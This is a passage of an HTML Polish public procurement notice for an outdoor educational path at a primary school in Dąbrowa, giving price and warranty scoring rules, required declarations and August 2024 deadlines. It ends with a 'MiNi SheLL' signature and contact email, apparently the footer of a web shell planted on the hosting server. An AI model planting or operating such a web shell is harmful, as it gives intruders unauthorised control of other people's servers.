oferowana w badanej ofercie <br/><br/>Okres gwarancji w formularzu ofertowym należy podać w pełnych miesiącach.<br/>Minimalny okres gwarancji wymagany przez Zamawiającego wynosi 24 miesięcy.<br/>Maksymalny okres gwarancji wynosi 48 miesięcy.<br/>Jeżeli Wykonawca zaproponuje w ofercie okres gwarancji dłuższy niż 48 miesięcy, termin ten będzie wiążący dla Wykonawcy, jednakże do oceny ofert w kryterium okres gwarancji zostanie przyjęty okres maksymalny określony w SWZ, czyli 48 miesięcy.<br/>Jeżeli Wykonawca zaoferuje okres gwarancji krótszy niż 24 miesiące jego oferta zostanie odrzucona.<br/>Maksymalna ilość punktów, jaką można uzyskać w kryterium okres gwarancji wynosi: 40 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> - Zadanie 4 polegające na utworzeniu ścieżki edukacyjnej w Szkole Podstawowej w Dąbrowie<br/>obejmuje: <br/>•	montaż metalowych tablic edukacyjnych <br/><br/><br/>na szkolnym terenie zewnętrznym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">43325000-7 - Wyposażenie parków i placów zabaw</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-04</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą, zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach:<br/><br/>a) Cena – „C”<br/>b) Okres gwarancji – „G” <br/><br/>Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru:<br/><br/>Całkowita ocena punktowa = ocena „C” + ocena „G”<br/><br/>Punktacja przyznawana ofertom w poszczególnych kryteriach będzie wyliczona z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>Zamawiający nie przewiduje przeprowadzenia dogrywki w formie aukcji elektronicznej.<br/><br/>2. Powyższym kryteriom Zamawiający przypisał następujące znaczenie :<br/><br/>a) kryterium – cena „C” :<br/><br/>Kryterium	Waga %	Liczba punktów Sposób oceny wg wzoru<br/>Cena „C”	60 %	60 Najniższa cena ofertowa brutto niepodlegająca odrzuceniu<br/>C = ------------------------------------------- x 60 pkt.<br/> Cena brutto oferty badanej <br/>niepodlegająca odrzuceniu<br/><br/><br/>Ocenie zostanie poddana cena brutto za realizację zamówienia, wynikająca z formularza ofertowego. Liczba punktów, którą można uzyskać w tym kryterium zostanie obliczona wg powyższego wzoru.<br/><br/>Maksymalna ilość punktów, jaką można uzyskać w kryterium cena wynosi: 60 pkt.<br/><br/>b) kryterium okres gwarancji ( waga 40 %), będzie wyliczona wg następującej zasady: <br/><br/>G = (Gx/Gmax) x 40 pkt.<br/><br/>gdzie : <br/>- G – liczba punktów przyznana ocenianej ofercie w ramach kryterium gwarancja, <br/>- Gmax – gwarancja maksymalna w oferowanych ofertach,<br/>- Gx – gwarancja oferowana w badanej ofercie <br/><br/>Okres gwarancji w formularzu ofertowym należy podać w pełnych miesiącach.<br/>Minimalny okres gwarancji wymagany przez Zamawiającego wynosi 24 miesięcy.<br/>Maksymalny okres gwarancji wynosi 48 miesięcy.<br/>Jeżeli Wykonawca zaproponuje w ofercie okres gwarancji dłuższy niż 48 miesięcy, termin ten będzie wiążący dla Wykonawcy, jednakże do oceny ofert w kryterium okres gwarancji zostanie przyjęty okres maksymalny określony w SWZ, czyli 48 miesięcy.<br/>Jeżeli Wykonawca zaoferuje okres gwarancji krótszy niż 24 miesiące jego oferta zostanie odrzucona.<br/>Maksymalna ilość punktów, jaką można uzyskać w kryterium okres gwarancji wynosi: 40 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Oferta musi zawierać następujące oświadczenia i dokumenty:<br/>1.1.	Formularz ofertowy – zgodnie z załącznikiem nr 1 do SWZ, w przypadku gdy Wykonawca nie korzysta z przygotowanego przez Zamawiającego wzoru, w treści oferty należy zamieścić wszystkie informacje wymagane w Formularzu ofertowym.<br/>1.2.	Oświadczenia, o których mowa w Rozdziale X ust. 1: <br/>1.2.1.	Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania – wzór oświadczenia stanowi załącznik nr 3 do SWZ. <br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie <br/>o niepodleganiu wykluczeniu składa każdy Wykonawca.<br/>1.3.	Pełnomocnictwa upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik.<br/>1.4.	Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia – dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>Rozdziale X ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia.<br/>3. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie.<br/>* dotyczy także spółek cywilnych <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Ze względu na ograniczoną ilość znaków, Zamawiający informuje, że szczegółowy zakres i rodzaj zmian umowy oraz<br/>warunków ich wprowadzania zostały uregulowane w projektowanych postanowieniach umownych stanowiących załącznik nr<br/>2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-23 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/dopiewo</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-23 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-09-21</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Niniejsze przedsięwzięcie jest współfinansowane ze środków Wojewódzkiego Funduszu Ochrony Środowiska <br/>i Gospodarki Wodnej w Poznaniu.<br/>Niniejsze zamówienie zostanie udzielone w 2 częściach, zgodnie z art. 30 ust. 2 PZP (Dz.U.2023.1605 t.j.).

Creat By MiNi SheLL
Email: jattceo@gmail.com